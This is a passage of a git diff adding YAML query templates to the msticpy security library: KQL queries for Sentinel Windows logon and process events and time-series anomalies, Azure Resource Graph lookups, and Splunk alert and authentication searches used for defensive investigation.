+            | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+            | extend (anomalies, score, baseline) = series_decompose_anomalies({aggregatecolumn}, {scorethreshold},-1,"linefit")
+            | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long) 
+            | extend score = round(score,2)
+            {add_query_items}'
+  plot_timeseries_datawithbaseline:
+    description: Plot timeseries data using built-in KQL time series decomposition using built-in KQL render method
+    args:
+      query: '
+            {table}
+            {where_clause} 
+            | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+            | where {timestampcolumn} >= datetime({start})
+            | where {timestampcolumn} <= datetime({end})
+            | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+            | extend (baseline,seasonal,trend,residual) = series_decompose({aggregatecolumn}) 
+            | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), baseline to typeof(long), seasonal to typeof(long), trend to typeof(long), residual to typeof(long)
+            | project {timestampcolumn}, {aggregatecolumn}, baseline
+            | render timechart with (title="Time Series Decomposition - Baseline vs Observed TimeChart")
+            {add_query_items}'
+  plot_timeseries_scoreanomolies:
+    description: Plot timeseries anomaly score using built-in KQL render method
+    args:
+      query: '
+            {table}
+            {where_clause} 
+            | project {timestampcolumn},{aggregatecolumn},{groupbycolumn}
+            | where {timestampcolumn} >= datetime({start})
+            | where {timestampcolumn} <= datetime({end})
+            | make-series {aggregatecolumn}={aggregatefunction} on {timestampcolumn} from datetime({start}) to datetime({end}) step {timeframe} by {groupbycolumn}
+            | extend (anomalies, score, baseline) = series_decompose_anomalies({aggregatecolumn}, {scorethreshold},-1,"linefit")
+            | mv-expand {aggregatecolumn} to typeof(double), {timestampcolumn} to typeof(datetime), anomalies to typeof(double), score to typeof(double), baseline to typeof(long)
+            | project {timestampcolumn}, score
+            | render timechart with (title="Time Series Anomalies TimeChart")
+            {add_query_items}'
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_winevent.yaml b/msticpy/data/queries/kql_sent_winevent.yaml
new file mode 100644
index 000000000..8df82334e
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_winevent.yaml
@@ -0,0 +1,123 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Windows Security Event Queries
+  data_environments: [LogAnalytics]
+  data_families: [WindowsSecurity]
+  tags: ['windows', 'event', 'security']
+defaults:
+  metadata:
+    data_source: 'security_event'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityEvent'
+      query_project:
+        description: Column project statement
+        type: str
+        default: ''
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_host_events:
+    description: Retrieves list of all events on a host
+    metadata:
+      pivot:
+        short_name: all_events
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where Computer {host_op} "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      host_op:
+        description: The hostname match operator
+        type: str
+        default: has
+  list_host_events_by_id:
+    description: Retrieves list of events on a host
+    metadata:
+      pivot:
+        short_name: events_by_id
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where EventID in ({event_list})
+        | where Computer {host_op} "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      host_op:
+        description: The hostname match operator
+        type: str
+        default: has
+      event_list:
+        description: List of event IDs to match
+        type: list
+        default: has
+  list_other_events:
+    description: Retrieves list of events other than logon and process on a host
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where EventID !in ("4688", "4624", "4625")
+        | where Computer {host_op} "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      host_op:
+        description: The hostname match operator
+        type: str
+        default: has
+  list_events:
+    description: Retrieves list of all events
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+  list_events_by_id:
+    description: Retrieves list of events on a host
+    args:
+      query: '
+        {table}
+        {query_project}
+        | where EventID in ({event_list})
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      event_list:
+        description: List of event IDs to match
+        type: list
\ No newline at end of file
diff --git a/msticpy/data/queries/kql_sent_winevent_logon.yaml b/msticpy/data/queries/kql_sent_winevent_logon.yaml
new file mode 100644
index 000000000..cad36a875
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_winevent_logon.yaml
@@ -0,0 +1,226 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Windows Logon Event Queries
+  data_environments: [LogAnalytics]
+  data_families: [WindowsSecurity]
+  tags: ['process', 'windows', 'processtree', 'session']
+defaults:
+  metadata:
+    data_source: 'security_event'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityEvent'
+      event_filter:
+        description: Event subset
+        type: str
+        default: '| where EventID == 4624'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project
+            TenantId,
+            Account,
+            EventID,
+            TimeGenerated,
+            SourceComputerId,
+            Computer,
+            SubjectUserName,
+            SubjectDomainName,
+            SubjectUserSid,
+            TargetUserName,
+            TargetDomainName,
+            TargetUserSid,
+            TargetLogonId,
+            LogonProcessName,
+            LogonType,
+            LogonTypeName,
+            AuthenticationPackageName,
+            Status,
+            IpAddress,
+            WorkstationName
+          | extend TimeCreatedUtc=TimeGenerated'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+sources:
+  get_host_logon:
+    description: Retrieves the logon event for the session id on the host
+    metadata:
+      pivot:
+        short_name: logon_session
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where TargetLogonId == "{logon_session_id}"
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      logon_session_id:
+        description: The logon session ID of the source process
+        type: str
+  list_host_logons:
+    description: Retrieves the logon events on the host
+    metadata:
+      pivot:
+        short_name: logons
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+  list_host_logon_failures:
+    description: Retrieves the logon failure events on the host
+    metadata:
+      pivot:
+        short_name: logon_failures
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      event_filter:
+        description: Table name
+        type: str
+        default: '| where EventID == 4625'
+  list_logons_by_account:
+    description: Retrieves the logon events for an account
+    metadata:
+      pivot:
+        short_name: logons
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Account has "{account_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: The account name to find
+        type: str
+  list_logon_attempts_by_account:
+    description: Retrieves the logon events for an account
+    metadata:
+      pivot:
+        short_name: logon_attempts
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Account has "{account_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: The account name to find
+        type: str
+      event_filter:
+        description: Event ID filter
+        type: str
+        default: '| where EventID in (4624, 4625)'
+  list_logon_failures_by_account:
+    description: Retrieves the logon failure events  for an account
+    metadata:
+      pivot:
+        short_name: logon_failures
+        direct_func_entities:
+          - Account
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Account has "{account_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        {add_query_items}'
+    parameters:
+      account_name:
+        description: The account name to find
+        type: str
+      event_filter:
+        description: Event ID filter
+        type: str
+        default: '| where EventID == 4625'
+  list_all_logons_by_host:
+    description: account all failed or successful logons to a host
+    metadata:
+      pivot:
+        short_name: logon_attempts
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | extend LogonResult = iif(EventID==4624, "Success", "Failure")
+        | extend SourceIP = IpAddress
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      event_filter:
+        description: Event ID filter
+        type: str
+        default: '| where EventID in (4624, 4625)'
diff --git a/msticpy/data/queries/kql_sent_winevent_proc.yaml b/msticpy/data/queries/kql_sent_winevent_proc.yaml
new file mode 100644
index 000000000..352dd0b3f
--- /dev/null
+++ b/msticpy/data/queries/kql_sent_winevent_proc.yaml
@@ -0,0 +1,347 @@
+metadata:
+  version: 1
+  description: Kql Sentinel Windows Process Event Queries
+  data_environments: [LogAnalytics]
+  data_families: [WindowsSecurity]
+  tags: ['account', 'windows', 'logon', 'session', 'logonfail']
+defaults:
+  metadata:
+    data_source: 'security_event'
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'SecurityEvent'
+      event_filter:
+        description: Event ID filter
+        type: str
+        default: '| where EventID == 4688'
+      query_project:
+        description: Column project statement
+        type: str
+        default: '
+          | project
+            TenantId,
+            Account,
+            EventID,
+            TimeGenerated,
+            Computer,
+            SubjectUserSid,
+            SubjectUserName,
+            SubjectDomainName,
+            SubjectLogonId,
+            NewProcessId,
+            NewProcessName,
+            TokenElevationType,
+            ProcessId,
+            CommandLine,
+            ParentProcessName,
+            TargetLogonId,
+            SourceComputerId
+          | extend TimeCreatedUtc=TimeGenerated'
+      start:
+        description: Query start time
+        type: datetime
+      end:
+        description: Query end time
+        type: datetime
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+      subscription_filter:
+        description: Optional subscription/tenant filter expression
+        type: str
+        default: 'true'
+      path_separator:
+        description: Path separator
+        type: str
+        default: '\\'
+sources:
+  list_host_processes:
+    description: Retrieves list of processes on a host
+    metadata:
+      pivot:
+        short_name: processes
+        direct_func_entities:
+          - Host
+    args:
+      query: '
+        let start = datetime({start});
+        let end = datetime({end});
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer {host_op} "{host_name}"
+        | where TimeGenerated >= start
+        | where TimeGenerated <= end
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      host_op:
+        description: The hostname match operator
+        type: str
+        default: has
+  list_matching_processes:
+    description: Retrieves list of processes matching process name
+    metadata:
+      pivot:
+        short_name: similar_processes
+        direct_func_entities:
+          - Process
+    args:
+      query: '
+        let start = datetime({start});
+        let end = datetime({end});
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where NewProcessName {proc_op} "{process_name}"
+        | where TimeGenerated >= start
+        | where TimeGenerated <= end
+        {add_query_items}'
+    parameters:
+      process_name:
+        description: Name of process
+        type: str
+      proc_op:
+        description: The process name match operator
+        type: str
+        default: has
+  get_process_tree:
+    description: Retrieves the process tree of a supplied process
+    args:
+      query: '
+        let start = datetime({start});
+        let end = datetime({end});
+        let sourceProcessId = "{process_id}";
+        let sourceLogonId = "{logon_session_id}";
+        let sourceProcess =
+        materialize(
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start
+            | where TimeGenerated <= end
+            | where SubjectLogonId == sourceLogonId
+            | where NewProcessId == sourceProcessId
+            | where NewProcessName =~ "{process_name}"
+            | extend NodeRole = "source", Level = 0
+            | top 1 by TimeCreatedUtc desc nulls last);
+        let sourceTimeCreatedUtc = toscalar(sourceProcess | project TimeCreatedUtc);
+        let sourceParentProcessId = toscalar(sourceProcess | project ProcessId);
+        let system_session_id = "0x3e7";
+        let parentProcess =
+        materialize(
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start - time(1d)
+            | where TimeGenerated <= end
+            | where TimeGenerated <= sourceTimeCreatedUtc
+            | where (SubjectLogonId == sourceLogonId or TargetLogonId == sourceLogonId)
+            | where NewProcessId == sourceParentProcessId
+            | extend NodeRole = "parent", Level = 1
+            | top 1 by TimeCreatedUtc desc nulls last);
+        let parentLogonId = toscalar(sourceProcess | project SubjectLogonId);
+        let parentTimeCreated = toscalar(sourceProcess | project TimeCreatedUtc);
+        let childProcesses =
+        materialize(
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start
+            | where TimeGenerated <= end
+            | where SubjectLogonId == sourceLogonId
+            | where ProcessId == sourceProcessId
+            | extend NodeRole = "child", Level = 1);
+        sourceProcess
+        | union (parentProcess)
+        | union (childProcesses)
+        | union
+        (
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start - time(1d)
+            | where TimeGenerated <= end
+            | where TimeGenerated <= parentTimeCreated
+            | where (SubjectLogonId == parentLogonId or TargetLogonId == parentLogonId)
+            | extend NodeRole = "parent", Level = 2
+            | join (parentProcess | project ProcessId)
+                on $left.NewProcessId == $right.ProcessId
+        )
+        | union
+        (
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start
+            | where TimeGenerated <= end
+            | where SubjectLogonId == sourceLogonId and SubjectLogonId != system_session_id
+            | extend NodeRole = "child", Level = 2
+            | join (childProcesses | project NewProcessId)
+                on $left.ProcessId == $right.NewProcessId
+        )
+        | union
+        (
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start
+            | where TimeGenerated <= end
+            | where SubjectLogonId == sourceLogonId
+            | where ProcessId == sourceParentProcessId
+            | where NewProcessId != sourceProcessId
+            | extend NodeRole = "sibling", Level = 1
+        )
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      process_name:
+        description: Name of process
+        type: str
+      process_id:
+        description: The process ID of the source process
+        type: str
+      logon_session_id:
+        description: The logon session ID of the source process
+        type: str
+  get_parent_process:
+    description: Retrieves the parent process of a supplied process
+    metadata:
+      pivot:
+        short_name: parent_process
+        direct_func_entities:
+          - Process
+    args:
+      query: '
+        let start = datetime({start});
+        let end = datetime({end});
+        let sourceProcessId = "{process_id}";
+        let sourceLogonId = "{logon_session_id}";
+        let sourceProcess =
+        materialize(
+            {table}
+            {event_filter}
+            {query_project}
+            | where {subscription_filter}
+            | where Computer has "{host_name}"
+            | where TimeGenerated >= start
+            | where TimeGenerated <= end
+            | where SubjectLogonId == sourceLogonId
+            | where NewProcessId == sourceProcessId
+            | where NewProcessName =~ "{process_name}"
+            | extend NodeRole = "source", Level = 0
+            | top 1 by TimeCreatedUtc desc nulls last);
+        let sourceTimeCreatedUtc = toscalar(sourceProcess | project TimeCreatedUtc );
+        let sourceParentProcessId = toscalar(sourceProcess | project ProcessId);
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= start - time({parent_lookback}h)
+        | where TimeGenerated <= end
+        | where TimeGenerated <= sourceTimeCreatedUtc
+        | where (SubjectLogonId == sourceLogonId or TargetLogonId == sourceLogonId)
+        | where NewProcessId == sourceParentProcessId
+        | where NewProcessId == sourceParentProcessId
+        | extend NodeRole = "parent", Level = 1
+        | top 1 by TimeCreatedUtc desc nulls last)
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      process_name:
+        description: Name of process
+        type: str
+      process_id:
+        description: The process ID of the source process
+        type: str
+      logon_session_id:
+        description: The logon session ID of the source process
+        type: str
+      parent_lookback:
+        description: The number of hours to look back for parent process
+        type: int
+        default: 2
+  list_hosts_matching_commandline:
+    description: Retrieves processes on hosts with matching commandline
+    metadata:
+      pivot:
+        short_name: processes_with_same_commandline
+        direct_func_entities:
+          - Process
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where NewProcessName endswith "{process_name}"
+        | where CommandLine =~ "{commandline}"
+        {add_query_items}'
+    parameters:
+      process_name:
+        description: Name of process
+        type: str
+      commandline:
+        description: The command line of the source process
+        type: str
+  list_processes_in_session:
+    description: Retrieves all processes on the host for a logon session
+    metadata:
+      pivot:
+        short_name: process_session
+        direct_func_entities:
+          - Host
+          - Process
+    args:
+      query: '
+        {table}
+        {event_filter}
+        {query_project}
+        | where {subscription_filter}
+        | where Computer has "{host_name}"
+        | where TimeGenerated >= datetime({start})
+        | where TimeGenerated <= datetime({end})
+        | where SubjectLogonId == "{logon_session_id}"
+        | extend processName = tostring(split(NewProcessName, "{path_separator}")[-1])
+        | extend commandlineparts = arraylength(split(CommandLine, " "))
+        | extend commandlinelen = strlen(CommandLine)
+        {add_query_items}'
+    parameters:
+      host_name:
+        description: Name of host
+        type: str
+      process_name:
+        description: Name of process
+        type: str
+      process_id:
+        description: The process ID of the source process
+        type: str
+      logon_session_id:
+        description: The logon session ID of the source process
+        type: str
\ No newline at end of file
diff --git a/msticpy/data/queries/local_data.yaml b/msticpy/data/queries/local_data.yaml
new file mode 100644
index 000000000..de8da3a61
--- /dev/null
+++ b/msticpy/data/queries/local_data.yaml
@@ -0,0 +1,74 @@
+metadata:
+  version: 1
+  description: Local Data Alert Queries
+  data_environments: [LocalData]
+  data_families: [SecurityAlert, WindowsSecurity, Network, Azure]
+  tags: ['alert', 'securityalert', 'process', 'account', 'network', 'logon']
+defaults:
+  metadata:
+    data_source: 'security_alert'
+  parameters:
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+      data_families: [SecurityAlert]
+    args:
+      query: alerts_list.pkl
+    parameters:
+  list_host_processes:
+    description: List processes on host
+    metadata:
+      data_families: [WindowsSecurity]
+    args:
+      query: processes_on_host.pkl
+    parameters:
+  list_host_logons:
+    description: List logons on host
+    metadata:
+      data_families: [WindowsSecurity]
+    args:
+      query: host_logons.pkl
+    parameters:
+  list_host_logon_failures:
+    description: List logon failures on host
+    metadata:
+      data_families: [WindowsSecurity]
+    args:
+      query: failed_logons.pkl
+    parameters:
+  list_host_events:
+    description: List events failures on host
+    metadata:
+      data_families: [WindowsSecurity]
+    args:
+      query: all_events_df.pkl
+    parameters:
+  get_process_tree:
+    description: Get process tree for a process
+    metadata:
+      data_families: [WindowsSecurity]
+    args:
+      query: process_tree.pkl
+    parameters:
+  list_azure_network_flows_by_ip:
+    description: List Azure Network flows by IP address
+    metadata:
+      data_families: [Network]
+    args:
+      query: az_net_comms_df.pkl
+    parameters:
+  list_azure_network_flows_by_host:
+    description: List Azure Network flows by host name
+    metadata:
+      data_families: [Network]
+    args:
+      query: az_net_comms_df.pkl
+    parameters:
+  list_all_signins_geo:
+    description: List all Azure AD logon events
+    metadata:
+      data_families: [Azure]
+    args:
+      query: aad_logons.pkl
+    parameters:
\ No newline at end of file
diff --git a/msticpy/data/queries/resource_graph_queries.yaml b/msticpy/data/queries/resource_graph_queries.yaml
new file mode 100644
index 000000000..7f434ca8d
--- /dev/null
+++ b/msticpy/data/queries/resource_graph_queries.yaml
@@ -0,0 +1,112 @@
+metadata:
+  version: 1
+  description: Resource Graph Queries
+  data_environments: [ResourceGraph]
+  data_families: [ResourceGraph]
+  tags: ['iaas', 'paas']
+defaults:
+  metadata:
+    data_source: 'resource_graph'
+    top: 1000
+  parameters:
+      table:
+        description: Table name
+        type: str
+        default: 'resources'
+      add_query_items:
+        description: Additional query clauses
+        type: str
+        default: ''
+sources:
+  list_resources:
+    description: Retrieves list of resources
+    metadata:
+    args:
+      query: '
+        {table}
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_resources_by_type:
+      description: Retrieves list of resources by type
+      metadata:
+      args:
+        query: '
+          {table}
+          | where type =~ "{resource_type}"
+          | order by name desc
+          {add_query_items}'
+        uri: None
+      parameters:
+        resource_type:
+          description: Azure resource provider
+          type: str
+  list_virtual_machines:
+    description: Retrieves list of VM resources
+    metadata:
+    args:
+      query: '
+        {table}
+        | where type =~ "Microsoft.Compute/virtualMachines"
+        | order by name desc
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_public_ips:
+    description: Retrieves list of resources with public IP addresses
+    metadata:
+    args:
+      query: '
+        {table}
+        | where type contains "publicIPAddresses" and isnotempty(properties.ipAddress)
+        | project properties.ipAddress
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_resources_by_api_version:
+    description: Retrieves list of resources for each API version
+    metadata:
+    args:
+      query: '
+        {table}
+        | distinct type, apiVersion
+        | where isnotnull(apiVersion)
+        | order by type asc
+        {add_query_items}'
+      uri: None
+    parameters:
+  list_detailed_virtual_machines:
+    description: Retrieves list of VMs with network details
+    metadata:
+    args:
+      query: '
+        {table}
+        | where type =~ "microsoft.compute/virtualmachines"
+        | where name contains "{host_name}"
+        | extend nics=array_length(properties.networkProfile.networkInterfaces)
+        | mv-expand nic=properties.networkProfile.networkInterfaces
+        | where nics == 1 or nic.properties.primary =~ "true" or isempty(nic)
+        | project vmId = id, vmName = name, vmSize=tostring(properties.hardwareProfile.vmSize), nicId = tostring(nic.id)
+        | join kind=leftouter (
+            Resources
+            | where type =~ "microsoft.network/networkinterfaces"
+            | extend ipConfigsCount=array_length(properties.ipConfigurations)
+            | mv-expand ipconfig=properties.ipConfigurations
+            | where ipConfigsCount == 1 or ipconfig.properties.primary =~ "true"
+            | project nicId = id, publicIpId = tostring(ipconfig.properties.publicIPAddress.id))
+        on nicId
+        | project-away nicId1
+        | summarize by vmId, vmName, vmSize, nicId, publicIpId
+        | join kind=leftouter (
+            Resources
+            | where type =~ "microsoft.network/publicipaddresses"
+            | project publicIpId = id, publicIpAddress = properties.ipAddress)
+        on publicIpId
+        | project-away publicIpId1
+        {add_query_items}'
+      uri: None
+    parameters:
+      host_name:
+        description: A hostname to filter on
+        type: str
+        default: ''
\ No newline at end of file
diff --git a/msticpy/data/queries/splunk_alert_queries.yaml b/msticpy/data/queries/splunk_alert_queries.yaml
new file mode 100644
index 000000000..67509a5e1
--- /dev/null
+++ b/msticpy/data/queries/splunk_alert_queries.yaml
@@ -0,0 +1,72 @@
+metadata:
+  version: 1
+  description: Splunk Alert Queries (non-accelerated)
+  data_environments: [Splunk]
+  data_families: [SplunkDatamodel]
+  tags: ['alerts']
+defaults:
+  metadata:
+    data_source: 'bots'
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    project_fields:
+      description: Project Field names
+      type: str
+      default: '| table _time, host, source, sourcetype, src, dest, description, type, user, severity, signature, subject, body, mitre_technique_id, signature_id, app'
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: '| head 100'
+    field_rename:
+      description: Renames fields which are prepended by datamodel name
+      type: str
+      default: '|rename "Alerts.*" as *'
+    timeformat:
+      description: 'Datetime format to use in Splunk query'
+      type: str
+      default: '"%Y-%m-%d %H:%M:%S.%6N"'
+sources:
+  list_alerts:
+    description: Retrieves list of alerts
+    metadata:
+      data_families: [Alerts]
+    args:
+      query: '|datamodel Alerts Alerts search {field_rename} {project_fields} {add_query_items}'
+
+  list_alerts_for_src_ip:
+    description: Retrieves list of alerts with a common source IP Address
+    metadata:
+      data_families: [Alerts]
+    args:
+      query: '|datamodel Alerts Alerts search {field_rename}| search src={ip_address} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      ip_address:
+        description: The source IP Address to search on
+        type: str
+  
+  list_alerts_for_dest_ip:
+    description: Retrieves list of alerts with a common destination IP Address
+    metadata:
+      data_families: [Alerts]
+    args:
+      query: '|datamodel Alerts Alerts search| search dest={ip_address} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      ip_address:
+        description: The source IP Address to search on
+        type: str
+
+  list_alerts_for_user:
+    description: Retrieves list of alerts with a common username
+    metadata:
+      data_families: [Alerts]
+    args:
+      query: '|datamodel Alerts Alerts search| search user={user} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      user:
+        description: The username to search on
+        type: str
\ No newline at end of file
diff --git a/msticpy/data/queries/splunk_authentication_queries.yaml b/msticpy/data/queries/splunk_authentication_queries.yaml
new file mode 100644
index 000000000..e79f94b88
--- /dev/null
+++ b/msticpy/data/queries/splunk_authentication_queries.yaml
@@ -0,0 +1,72 @@
+metadata:
+  version: 1
+  description: Splunk Authentication Queries (non-accelerated)
+  data_environments: [Splunk]
+  data_families: [SplunkDatamodel]
+  tags: ['authentication', 'account', 'network']
+defaults:
+  metadata:
+    data_source: 'bots'
+  parameters:
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    project_fields:
+      description: Project Field names
+      type: str
+      default: '| table _time, host, source, sourcetype, reason, signature, signature_id, src, dest, src_user, user, app, action'
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: '| head 100'
+    field_rename:
+      description: Renames fields which are prepended by datamodel name
+      type: str
+      default: '|rename "Authentication.*" as *'
+    timeformat:
+      description: 'Datetime format to use in Splunk query'
+      type: str
+      default: '"%Y-%m-%d %H:%M:%S.%6N"'
+sources:
+  list_logons_for_host:
+    description: All logon events on a host
+    metadata:
+      data_families: [Authentication]
+    args:
+      query: '|datamodel Authentication Authentication search | search Authentication.dest={host_name} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      host_name:
+        description: Hostname to query for
+        type: str
+
+  list_logons_for_source_ip:
+    description: All successful user logon events for source IP (all hosts)
+    metadata:
+      data_families: [Authentication]
+    args:
+      query: '|datamodel Authentication Authentication search | search Authentication.src={ip_address} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      ip_address:
+        description: The source IP Address to search on
+        type: str
+
+  list_logon_failures:
+    description: All failed user logon events on any host
+    metadata:
+      data_families: [Authentication]
+    args:
+      query: '|datamodel Authentication Authentication search | search Authentication.action=failure {field_rename} {project_fields} {add_query_items}'
+  
+  list_logons_for_account:
+    description: All successful user logon events for account (all hosts)
+    metadata:
+      data_families: [Authentication]  
+    args:
+      query: '|datamodel Authentication Authentication search | search Authentication.user={account_name} {field_rename} {project_fields} {add_query_items}'
+    parameters:
+      account_name:
+        description: The account name to search on
+        type: str
diff --git a/msticpy/data/queries/splunk_queries.yaml b/msticpy/data/queries/splunk_queries.yaml
new file mode 100644
index 000000000..0cdc60163
--- /dev/null
+++ b/msticpy/data/queries/splunk_queries.yaml
@@ -0,0 +1,90 @@
+metadata:
+  version: 1
+  description: Splunk Queries
+  data_environments: [Splunk]
+  data_families: [SplunkGeneral]
+  tags: ['alert', 'securityalert', 'process', 'account', 'network']
+defaults:
+  metadata:
+    data_source: 'bots'
+  parameters:
+    index:
+      description: 'Splunk index name'
+      type: str
+      default: '*'
+    source:
+      description: 'Splunk source type'
+      type: str
+      default: '*'
+    start:
+      description: Query start time
+      type: datetime
+    end:
+      description: Query end time
+      type: datetime
+    project_fields:
+      description: Project Field names
+      type: str
+      default: '| table TimeCreated, host, EventID, EventDescription, User, process, cmdline, Image, parent_process, ParentCommandLine, dest, Hashes'
+    add_query_items:
+      description: Additional query clauses
+      type: str
+      default: '| head 100'
+    timeformat:
+      description: 'Datetime format to use in Splunk query'
+      type: str
+      default: '"%Y-%m-%d %H:%M:%S.%6N"'
+sources:
+  list_all_datatypes:
+    description: Summary of all events by index and sourcetype
+    metadata:
+      data_families: [SplunkGeneral]
+    args:
+      query: '
+      | tstats count as totalCount earliest(_time) as firstTime latest(_time)
+        as lastTime where index= "*" timeformat={timeformat} earliest={start} latest={end} by index sourcetype
+      | fieldformat firstTime=strftime(firstTime,"%Y/%m/%d %H:%M:%S")
+      | fieldformat lastTime=strftime(lastTime,"%Y/%m/%d %H:%M:%S")
+      | sort by totalCount desc
+      '
+    parameters:
+  list_all_alerts:
+    description: Retrieves all configured alerts
+    metadata:
+      data_families: [Alerts]
+    args:
+      query: '
+      | rest/servicesNS/-/search/saved/searches
+      | search alert.track=1
+      | fields title description search disabled triggered_alert_count actions action.script.filename alert.severity cron_schedule'
+    parameters:
+  list_all_savedsearches:
+    description: Retrieves all saved searches
+    metadata:
+      data_families: [SplunkGeneral]
+    args:
+      query: '
+      | rest /servicesNS/-/-/saved/searches splunk_server=local
